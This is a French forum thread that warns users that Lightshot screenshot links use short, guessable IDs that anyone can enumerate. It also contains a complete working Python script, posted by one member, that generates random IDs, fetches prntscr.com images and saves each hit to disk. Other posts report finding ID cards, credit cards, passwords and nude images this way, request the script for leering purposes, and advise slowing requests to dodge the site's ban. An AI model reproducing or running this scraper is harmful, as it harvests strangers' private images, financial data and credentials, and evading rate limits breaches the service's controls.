N'uploadez rien de délicat sur Lighshot !

[jdev]

Bonjour à tous,

Je vais essayer d'être au plus clair et concis.

Je pense que vous connaissez pratiquement tous Lighshot, application pour créer des captures d'écrans et les partager. Elle permet en effet d'uploader automatiquement sur ses serveurs des captures écran pour les partager en ligne via leur service

Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.

.

Jusque là, tout va bien me direz-vous, mais si vous êtes attentif, les screenshots se retrouvent sur une URL publique comme :

Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.

ou encore

Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.

Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.

Chaque URL est composé d'une chaîne alphanumérique séquencielle de 5-6 caractères, et il est donc très simple d'aller observer les screens des autres...

Merci à Naïm Gallouj d'avoir mis en lumière ce soucis.

J'ai donc codé un petit script me permettant d'enregistrer dans un dossier tout une séquence de screens allant par exemple de aaa000...baa000 à zzz999 (ce qui fait un bon paquets de photos, j'ai stopper le programme avant la fin...).
Et c'est comme ça que j'ai pu apercevoir beaucoup de merd de screens sans intérêt comme des captures d'écrans de jeux-vidéos ou bien des sites russes.. mais j'y ai aussi trouvé un bon nombre d'IP, de cartes d'identités/crédits, d'adresses mail gentiment suivies de mots de passe, de conversations personnelles (Facebook, Skype, Steam...), d'images de filles dénudées.. et j'en passe.

Tout ça pour prévenir de faire attention à ce que vous uploadez sur ce site.

Merci de votre attention ?

 

[Ashuz]

j'étais au courant de cette technique perso, en même temps en y réfléchissant ce n'est pas tellement un secret. Cependant tout le monde n'y pense pas forcément donc bonne initiative de prévenir

 

[Praxis']

Merci pour la prévention

 

[Thomas]

Merci pour avoir prévenu c'est sympa

 

[Jaolish]

Bonne astuce, les images se suppriment au bout d'un moment il me semble non ? je ne sais pas combien de jours par contre.

 

[jdev]

Bonne astuce, les images se suppriment au bout d'un moment il me semble non ? je ne sais pas combien de jours par contre.

Oui il me semble aussi mais aucune idée non plus du temps ?

 

[Djinh]

Merci de prévenir, je me disais aussi que les URL Lightshot pouvaient facilement être récupérer et nos données stockés étant donné que ce n'est que 6 caractères qui change.

 

[ExoTiiKz SEC]

Merci pour la prévention

 

[SziCx]

A savoir qu'il y a beaucoup d'autres sites avec lesquels la technique fonctionne aussi ! Ne jamais mettre n'importe quoi sur le web en règle générale.

 

[Imam]

Leak les images des meufs, y’en a qui veulent voir >.<

 

[Membre578448]

Envoie le script on veux de la femelle xD

 

[Rivals]

N’uploadez rien de sensible sur le web de manière générale

 

[GARO-NORD]

#!/usr/bin/env python

import httplib2, sys, os, random, string

ENDLINE = '\033[0m'
BOLD = '\033[1m'
YELLOW = '\033[93m'
BLUE = '\033[94m'
GREEN = '\033[92m'
RED = '\033[91m'
GREYBACK = '\033[40m'

dirname = 'Lightshotr'

pngCount = 0
foundss = 0

def generateId(size=6):
    return ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(size))

def SavePic(content, ID, ext):
    f = open(dirname + '/' +str(ID) + ext,'wb')
    f.write(content)
    f.close

def PrintStatus(pngCount, link, COLOR):
    sys.stdout.write(BLUE + BOLD + '[+] ' + ENDLINE + str(pngCount) + ' Screenshots Found - ' + COLOR + BOLD + link + ENDLINE + '\r')
    sys.stdout.flush()

def Aborting():
    print '\n\n' + GREEN + BOLD + '[+]' + ENDLINE + ' All found Screenshots were saved to: ' + BOLD + os.getcwd() + '/' + dirname + ENDLINE + ' . Enjoy ;)\n'
    sys.exit()

print YELLOW + BOLD + '''

 ''' + ENDLINE + GREYBACK + YELLOW + BOLD + 'Author:' + ENDLINE + ' @xD4rker\n'

if not os.path.exists(dirname):
    os.makedirs(dirname)

while 1:

    try:

        COLOR = RED
        ID = generateId()
        link = 'http://prntscr.com/' + ID + '/direct'
        h = httplib2.Http(timeout=100)
        resp = h.request(link)

        if 'content-location' in resp[0]:
            pngUrl = resp[0]['content-location']
            ext = '.' + pngUrl[-3:]

            if (pngUrl != 'http://i.imgur.com/8tdUI8N.png') & (ext == '.png' or ext == '.jpg'):
                pngCount += 1
                SavePic(resp[1], ID, ext)
                COLOR = GREEN
            
        PrintStatus(pngCount, link, COLOR)

    except KeyboardInterrupt:
Aborting()

 

[Membre578448]

Ton code marche pas avec python normal ?

 

[Karuma]

Yo foreal merci je savais pas :') Le nombre de truc louche que j'ai send à mes amis ahah

 

[InitSys]

Je veux bien le script si jamais !

Bonjour à tous,

Je vais essayer d'être au plus clair et concis.

Je pense que vous connaissez pratiquement tous Lighshot, application pour créer des captures d'écrans et les partager. Elle permet en effet d'uploader automatiquement sur ses serveurs des captures écran pour les partager en ligne via leur service

Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.

.

Jusque là, tout va bien me direz-vous, mais si vous êtes attentif, les screenshots se retrouvent sur une URL publique comme :

Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.

ou encore

Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.

Vous devez être inscrit pour voir les liens ! Inscrivez-vous ou connectez-vous ici.

Chaque URL est composé d'une chaîne alphanumérique séquencielle de 5-6 caractères, et il est donc très simple d'aller observer les screens des autres...



J'ai donc codé un petit script me permettant d'enregistrer dans un dossier tout une séquence de screens allant par exemple de aaa000...baa000 à zzz999 (ce qui fait un bon paquets de photos, j'ai stopper le programme avant la fin...).
Et c'est comme ça que j'ai pu apercevoir beaucoup de merd de screens sans intérêt comme des captures d'écrans de jeux-vidéos ou bien des sites russes.. mais j'y ai aussi trouvé un bon nombre d'IP, de cartes d'identités/crédits, d'adresses mail gentiment suivies de mots de passe, de conversations personnelles (Facebook, Skype, Steam...), d'images de filles dénudées.. et j'en passe.

Tout ça pour prévenir de faire attention à ce que vous uploadez sur ce site.

Merci de votre attention ?

Et au passage, merci de citer la source qui est Korben

 

[Florian.]

xD plutot pas mal

 

[InitSys]

J'ai trouvé un script qui faisait ça, et je me suis fait bannir car trop de request

 

[Florian.]

J'ai trouvé un script qui faisait ça, et je me suis fait bannir car trop de request

Idem au début, tu es ban 48h du site jte conseil de faire 1 requête toute les 10s

 

[Steve.]

Chaud quand même :0 merci d'avoir prévenu